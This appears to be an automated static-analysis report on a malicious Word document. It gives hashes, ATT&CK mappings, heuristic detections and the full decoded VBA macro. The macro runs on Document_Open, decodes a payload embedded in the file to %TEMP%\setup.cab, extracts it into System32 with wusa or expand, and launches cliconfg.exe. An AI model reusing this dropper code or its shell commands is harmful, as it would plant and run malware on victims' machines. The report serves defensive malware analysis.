Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4588f52af10e123b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 142.4 KB
Created: 2018-02-02 20:31:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 4a67dfd94df2581aeeefacdd8f97e7de
SHA-1: f3b62fea38cb44e15984d941445d24e6b309bc7b
SHA-256: 4588f52af10e123b050539fe48c317056e944b3ff0f9db9807cfcafaf74e1b8f
Risk Score: 450

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The sample contains VBA macros that leverage WScript.Shell and cmd.exe, indicating an intent to execute arbitrary commands. The presence of a Document_Open macro and calls to CreateObject and GetObject further suggest the execution of malicious code. The ClamAV detection as 'Doc.Dropper.Agent' reinforces the assessment that this file is a dropper for a second-stage payload.

Heuristics (12)

  • ClamAV: Doc.Dropper.Agent-6439018-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6439018-0
  • VBA macros detected [medium, 7 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched line in script:
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • GetObject call [high] OLE_VBA_GETOBJ
    Matched line in script:
        proc_query = "SELECT * FROM Win32_Processor"
        Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
        For Each info In proc_results
  • cmd.exe reference in VBA [high] OLE_VBA_CMD
    Matched line in script:
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script:
    End Function
    Private Sub Document_Open()
        With ActiveDocument.Content
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 145,858 bytes but its declared streams total only 74,997 bytes — 70,861 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found:
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3637 bytes
SHA-256: 82f8910e0616938b44ce5d12ccb45df98b7b3643ca9c054b7ecc59329c55ee47
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    
    Open InputFile For Binary As #1
        Seek #1, nOffset + 1
        lpInBuffer = Input(nCount, #1)
    Close #1
    
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function
Private Sub Document_Open()
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With

    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
        
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    
    If (cbFileBuffer = 134610) Then
        sTempFile = sTempPath & "\setup.cab"
        
        nResult = InStr(Application.Path, "x86")

    nResult = debase64(sFileName, 80896, 53714, sTempFile)
                
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub